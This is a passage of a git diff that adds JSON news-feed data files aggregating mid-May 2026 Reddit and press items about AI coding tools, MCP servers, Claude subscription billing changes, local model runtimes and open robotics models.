I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include.", + "category": "ai_models" + }, + { + "title": "OpenAI's deployment company move says more about the AI gap than any benchmark[D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T09:11:15.000Z", + "summary": "OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \\~150 engineers). The pitch: embed \"Forward Deployed Engineers\" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between \"model capability\" and \"production deployment\" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. 
For the ML community this should…", + "category": "ai_research" + }, + { + "title": "You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T06:38:26.000Z", + "summary": "Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. 
Seeing people now publishing workarounds instead of going A…", + "category": "ai_tools" + }, + { + "title": "I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-14T06:09:37.000Z", + "summary": "I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no \"any\". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. Here's what I found out: Claude Code (Opus 4.7): \\- Verified MCP before writing a line \\- Built 36 files in 12 minutes \\- Wrote its own WebSocket smoke test (3ms broadcast) \\- Zero errors first run \\- Total cost: \\~$2.50 Codex (GPT-5.5 via Cursor): \\- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \\- Task 2 shipped but needed a patch for infinite React loop \\- 28 files, more compact architecture \\- Total cost: \\~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. 
For co…", + "category": "ai_tools" + }, + { + "title": "Last week in Generative Image & Video", + "url": "https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T04:43:38.000Z", + "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \\- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \\- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \\- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. 
| [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?…", + "category": "creative_tools" + }, + { + "title": "Fully Realtime Interaction Models", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-14T02:25:36.000Z", + "summary": "I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on it's own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/)", + "category": "ai_models" + }, + { + "title": "Open-source, self-updating wiki for your codebase", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-14T01:47:30.000Z", + "summary": "I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you havewith Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. 
Currently only MacOS (would add a windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-15.json b/data/news-feed-2026-05-15.json new file mode 100644 index 0000000..4aa1f27 --- /dev/null +++ b/data/news-feed-2026-05-15.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:40.183Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-15", + "article_count": 15, + "archived_story_count": 629, + "articles": [ + { + "title": "Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?", + "url": "https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-15T17:30:17.000Z", + "summary": "Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? 
Would love to hear real-world workflows instead of generic AI tips.", + "category": "ai_tools" + }, + { + "title": "I built a free Google search MCP that actually works(searching, fetching, with PDF)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-15T13:18:10.000Z", + "summary": "✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: \"abstract\"` returns \\~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \\~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\\~1500 chars), letting the agent triage relevance, then call `extract` with `mode…", + "category": "ai_tools" + }, + { + "title": "Claude for Healthcare launched in January — but medical imaging is the obvious gap. 
Anyone else noticing?", + "url": "https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-15T16:19:44.000Z", + "summary": "I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call.", + "category": "ai_tools" + }, + { + "title": "Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-15T14:09:53.000Z", + "summary": "built an open source memory layer for ai agents. 
thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. lead with \"observability and accountability for ai agents\" instead of \"memory for ai agents\". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months", + "category": "ai_tools" + }, + { + "title": "I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-15T12:21:22.000Z", + "summary": "There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. 
It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback.", + "category": "ai_tools" + }, + { + "title": "Built a tool that publishes HTML artifacts securely behind company auth", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-15T12:07:44.000Z", + "summary": "Hey! Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between teammembers. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. It's first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course.", + "category": "ai_tools" + }, + { + "title": "Anthropic built the agentic features. 
Now they're billing them separately.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-15T03:08:21.000Z", + "summary": "Starting June 15, Claude subscribers get a separate monthly credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic (\"this was inevitable, the old model was broken\") - About 15% neutral to supportive (\"interactive use is untouched, this is fair\") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x. 
He said he now has to make the Claude Code experience on T3 Code \"significantly worse.\" Ben Hylak (co-founder of Raindrop.ai) responded: \"This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs.\" Theo also said: \"Framing this as a free credit instead of a regression for…", + "category": "ai_tools" + }, + { + "title": "Adaptive Markdown", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-15T00:23:24.000Z", + "summary": "I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \\-Turning articles and books into personalized learning objects \\- lecture notes with automatically maintained structure \\-documents with embedded code, tables, consoles, images, audio, or video \\-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat…", + "category": "ai_tools" + }, + { + "title": "Memory drift? Context bloat? 
A Claude Code skill I wrote to manage long-running memory libraries", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.99, + "date": "2026-05-15T11:34:28.000Z", + "summary": "I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for \"that bug we fixed last month\" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** \"Audit memory\" runs the script. 
\"Review session\" walks the recent session and surfaces what's worth keeping.…", + "category": "ai_tools" + }, + { + "title": "SailPoint Unveils Agentic Fabric for AI Agent Security", + "url": "https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security", + "source": "AI Magazine", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 0.7, + "date": "2026-05-15T18:00:34.440Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Open-weights vs. closed models: Nano Banana Pro was nerf'ed", + "url": "https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-15T23:27:46.000Z", + "summary": "Companies think that they can nerf the model and people won't notice. Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \\[dev\\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. 
https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/…", + "category": "creative_tools" + }, + { + "title": "AllenAI has been iterating on their MolmoAct2 models for robotics", + "url": "https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-15T21:30:46.000Z", + "summary": "r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. 
If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look.", + "category": "ai_models" + }, + { + "title": "Gemma4 26b MoE running in MLX with turboquant (and custom kernel)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-15T19:34:12.000Z", + "summary": "TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\\_XS + q4\\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y…", + "category": "ai_models" + }, + { + "title": "Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]", + "url": 
"https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-15T17:32:50.000Z", + "summary": "Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. **Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said \"I don't have inform…", + "category": "ai_research" + }, + { + "title": "Beta testers wanted: MCP server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-05-15T14:35:49.000Z", + "summary": "Claude Code learns your codebase by brute force every session. 
A single architectural question such as; \"Where does request validation happen?\" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, \"we did it this way because\" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. 
Before then I hoped to f…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-16.json b/data/news-feed-2026-05-16.json new file mode 100644 index 0000000..c6a402f --- /dev/null +++ b/data/news-feed-2026-05-16.json @@ -0,0 +1,275 @@ +{ + "generated": "2026-06-05T00:44:40.446Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-16", + "article_count": 15, + "archived_story_count": 407, + "articles": [ + { + "title": "Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T14:50:57.000Z", + "summary": "Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \\- 100 apps (was 50) \\- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \\- back behavior wrong, no system back \\- flat surfaces, no Material elevation \\- tab bar where a nav drawer or bottom nav belongs \\- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \\- Product intent: hierarchy, flow, states. Invariant across platforms. \\- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. 
Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y…", + "category": "ai_tools" + }, + { + "title": "GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "github_release" + ], + "matching_tags": [ + "api_update", + "open_source", + "github_release" + ], + "importance": 1, + "date": "2026-05-16T18:12:10.000Z", + "summary": "Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. **What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. 
* Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm…", + "category": "ai_models" + }, + { + "title": "macOS support in Lemonade has graduated out of beta!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-16T14:40:45.000Z", + "summary": "All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the update iPhone app, which can access all of this from your phone! 
